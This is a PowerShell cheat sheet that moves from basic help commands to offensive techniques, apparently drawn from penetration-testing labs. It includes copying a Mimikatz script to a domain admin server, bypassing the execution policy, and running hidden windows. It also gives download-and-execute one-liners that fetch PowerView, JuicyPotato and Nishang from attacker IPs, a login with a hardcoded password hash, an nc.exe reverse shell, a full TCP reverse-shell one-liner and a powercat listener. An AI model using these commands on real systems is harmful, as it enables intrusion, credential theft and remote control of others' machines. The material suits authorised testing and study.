Powershell Fu

  • -Full : Lists full help about a topic

  • -Examples: Lists examples of how to run a cmdlet

#Powershell Help
help *keyword*
powershell /? 
powershell -?
powershell -Help
Get-Help *

#List help for everything whose name contains the word process
Get-Help (process_name) -Full -Examples

#List all cmdlets
Get-Command -CommandType cmdlet
#Show every property of the output in list form (nothing truncated)
Get-ChildItem | Format-List  *

#Pipelining
Get-Process | Sort-Object -Unique | Select-Object ProcessName

#Default Modules directory
$Env:PSModulePath

#WMI
#List all WMI/CIM classes
Get-CimClass
#Query one WMI class (here Win32_Volume)
Get-WmiObject -Class Win32_Volume

#Get Alias
Get-Alias -Definition Get-ChildItem
#Updates the Help System
Update-Help

#Explore Registry
cd HKLM:\

#Scouring for files
Select-String -Path C:\Users\Dan\*.txt -Pattern pass*
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse | %{$_.FullName} 

#Open Files
Get-Content "File name.txt"

#Copy Files
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

#Hides powershell window during execution
powershell.exe -WindowStyle Hidden .\script1.ps1

#Add user to a group
Add-ADGroupMember -Identity <Group> -Members <User>

#Remove User from a Domain Group
Remove-ADGroupMember -Identity <Group> -Members <User>
Remove-LocalGroupMember -Group <Group> -Member <User>

#Import A Module
Import-Module <modulepath>

#List All Commands In A Module
Get-Command -Module <modulename>
Get-Command -Name Firewall

#View truncated output
$FormatEnumerationLimit=-1
<Command> | out-string -Width 500
#Outputs one string per line (omit -Stream to get a single string)
<Command> | Out-String -Stream

#History
Get-History
#Path where all of the history is saved
(Get-PSReadlineOption).HistorySavePath

#Tasks
tasklist

#Services
Get-Service

#Shortcut directory
"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell"

#Run Powershell with the execution policy bypassed
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Check whether powershell is running as 32Bit/64Bit
[Environment]::Is64BitProcess

#Run Powershell as 64Bit Process
c:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#On a 64-Bit System, run powershell as 32Bit Process
c:\windows\sysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Base64 decode the contents of a file (UTF-16LE, the encoding -EncodedCommand uses)
$EncodedText = Get-Content "File_to_be_encoded"
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

#Execute Base64 encoded scripts
powershell -EncodedCommand $enccommand

#Download Files
Invoke-WebRequest -Uri "http://172.16.10.1/PowerView.ps1" -OutFile "PowerView.ps1"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.0.172/JuicyPotato.exe','jp.exe')"


#Download & Execute 
powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.172/JuicyPotato.exe')                                                                                                                                               Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)

#Execute Commands/Script Block
powershell.exe -Command "& {Get-EventLog -LogName security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"

#Unzip files
Add-Type -AssemblyName System.IO.Compression.FileSystem
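function Unzip {
  # Extract every entry of $zipfile into $outpath with .NET's ZipFile class.
  #
  # Arguments:
  #   $zipfile - path to an existing .zip archive (must exist; Resolve-Path throws otherwise)
  #   $outpath - destination directory; created by ExtractToDirectory if missing
  #
  # Both paths are converted to provider (filesystem) paths first, because .NET
  # resolves relative paths against the process working directory, which is not
  # necessarily PowerShell's current location.
  param(
    [Parameter(Mandatory = $true)][string]$zipfile,
    [Parameter(Mandatory = $true)][string]$outpath
  )
  $zipfile = (Resolve-Path -LiteralPath $zipfile).ProviderPath
  $outpath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($outpath)
  # NOTE(review): when the archive comes from an untrusted source, confirm the
  # .NET version in use rejects entries that escape $outpath (e.g. "..\" names);
  # older frameworks did not validate this.
  [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}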
Unzip "C:\a.zip" "C:\a"
#In case of error with System.IO.Compression:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"
  • Using functions

Login as user using Powershell

  • Requires: Username:Password Hash

  • Shell access(eg:nc)

powershell.exe
$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Enter-PSSession -ComputerName localhost -Credential $credential

# To get a new shell as Administrator:
cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe 10.10.14.143 41337 -e cmd.exe"

Reverse Shells

#Download and execute
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 9001
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.19.99.39/Powerview.ps1'));Find-LocalAdminAccess
powershell.exe iex (iwr http://<IP>/File.ps1 -UseBasicParsing);Invoke-AllChecks

#One-liner Reverse-shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.188.200',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Powercat

. .\powercat.ps1
powercat -l -v -p 443 -t 1000
